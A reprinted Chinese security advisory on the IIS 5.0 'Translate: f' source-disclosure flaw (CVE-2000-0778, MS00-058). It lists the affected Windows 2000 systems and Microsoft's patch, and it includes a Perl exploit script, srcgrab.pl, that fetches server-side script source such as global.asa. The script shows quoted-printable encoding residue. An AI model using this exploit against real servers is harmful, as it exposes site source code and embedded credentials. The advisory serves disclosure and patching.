Microsoft IIS 5.0
2008-04-09 04:35:54来源:互联网 阅读 ()
发布日期:2000-08-14
更新日期:2000-08-14
受影响系统:
Microsoft IIS 5.0描述:
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server
BUGTRAQ ID: 1578
CVE(CAN) ID: CVE-2000-0778
IIS是Microsoft公司开发的流行的HTTP服务器程序,随同Windows操作系统捆绑发布。
IIS 5.0在处理某些带有特殊标记的HTTP请求时存在漏洞,远程攻击者可能利用此漏洞得到服务器上脚本的源码。
如果IIS 5.0接收到一个包含特殊头格式(Translate: f)的HTTP请求,同时URL末尾包含一个特殊字符("/")的话,IIS 会错误得调用脚本处理引擎,可能导致文件源码泄漏给远程用户。
<*来源:Daniel Docekal (ddoc@MIA.CZ)
链接:http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/0080.html
http://www.ciac.org/ciac/bulletins/k-065.shtml
http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 =
using a shared drive but I haven=B4t tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in =
BugTraq.
# Cheers 351 and FractalG :)
if (not $ARGV[0]) {
print qq~
Geee it=B4s running !! kewl :)))
Usage : srcgrab.pl <complete url of file to retrieve>
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl =
http://www.victim.com/default.asp > file_to_save
~; exit;}
$victimurl=3D$ARGV[0];
# Create a user agent object
use LWP::UserAgent;
$ua =3D new LWP::UserAgent;
# Create a request
my $req =3D new HTTP::Request GET =3D> $victimurl . '\\'; # Here =
is the backslash at the end of the url ;)
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate =3D> 'f'); # Here is the famous translate =
header :))
$req->content('match=3Dwww&errors=3D0');
# Pass request to the user agent and get a response back
my $res =3D $ua->request($req);
# Check the outcome of the response
if ($res->is_success) {
print $res->content;
} else {
print $res->error_as_HTML;
}
建议:
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS00-058)以及相应补丁:
MS00-058:Patch Available for "Specialized Header" Vulnerability
链接:http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
补丁下载:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
- Microsoft IIS 5.0 WebDAV拒绝服务漏洞(MS01-044) 2008-04-09
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
